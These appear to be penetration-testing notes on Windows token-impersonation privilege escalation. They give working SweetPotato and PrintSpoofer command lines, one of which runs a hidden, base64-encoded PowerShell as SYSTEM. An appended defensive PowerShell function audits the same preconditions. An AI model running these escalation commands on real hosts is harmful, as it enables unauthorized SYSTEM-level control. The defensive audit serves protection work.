Secondary Categories: 02-Windows Internals, 02-Privilege Escalation

There are several methods to leverage this permission on a Windows system. They require the account to hold one of the following privileges: SeImpersonate or SeAssignPrimaryToken.

We can identify if the current user has these permissions by running the following command:

whoami /priv

Sweet Potato

This tool contains various privilege escalation techniques that allow the attacker to go from a service account to SYSTEM. It leverages the following methods:

  • Original RottenPotato code and exploit by @foxglovesec
  • Weaponized JuicyPotato by @decoder_it and @Giutro along with BITS WinRM discovery
  • PrintSpoofer discovery and original exploit by @itm4n
  • EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam

# Exploiting a host with SweetPotato
.\SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc <BASE64_CMD>"

PrintSpoofer

First, ensure the Print Spooler service is running, using the following PowerShell command or the Windows Services console.

Get-Service Spooler

After transferring the binary or leveraging a COFF file, you can execute the following to escalate privileges.

.\PrintSpoofer.exe -i -c powershell
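
A defender-side audit of the two preconditions these notes name (the token privileges shown by `whoami /priv` and the state of the Spooler service), as an added example that is not part of the original notes or of either tool. The function name `Test-ImpersonationExposure` and the sample rows are constructed for illustration.

```powershell
# Added example: report whether the current account meets the preconditions
# described above. Run it in the context of each service account under review.
function Test-ImpersonationExposure {
    param(
        # CSV rows as printed by `whoami /priv /fo csv /nh` (name, description, state)
        [string[]]$PrivCsv = (whoami /priv /fo csv /nh),
        # Spooler service object; $null when the service is not installed
        $Spooler = (Get-Service -Name Spooler -ErrorAction SilentlyContinue)
    )
    $watched = 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege'

    # A privilege listed as Disabled is still held by the token and can be
    # enabled by its owner, so presence is what counts, not the State column.
    $held = @($PrivCsv |
        ConvertFrom-Csv -Header Name, Description, State |
        Where-Object { $watched -contains $_.Name })

    [pscustomobject]@{
        Account        = [Security.Principal.WindowsIdentity]::GetCurrent().Name
        HeldPrivileges = @($held | ForEach-Object { "$($_.Name) ($($_.State))" })
        HoldsPrivilege = ($held.Count -gt 0)
        SpoolerRunning = [bool]($Spooler -and $Spooler.Status -eq 'Running')
    }
}

# Live check of the current token and the local Spooler service
Test-ImpersonationExposure | Format-List

# Constructed sample rows (not captured from a real host) so the parsing can
# be exercised offline; the Spooler object is a stand-in with the same property.
$sample = @(
    '"SeAssignPrimaryTokenPrivilege","Replace a process level token","Disabled"',
    '"SeChangeNotifyPrivilege","Bypass traverse checking","Enabled"',
    '"SeImpersonatePrivilege","Impersonate a client after authentication","Enabled"'
)
$fakeSpooler = [pscustomobject]@{ Status = 'Running' }
Test-ImpersonationExposure -PrivCsv $sample -Spooler $fakeSpooler | Format-List
```

On hosts that do not print, stopping and disabling the Spooler service removes the precondition the PrintSpoofer section depends on; the other methods listed under Sweet Potato are not covered by that change.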
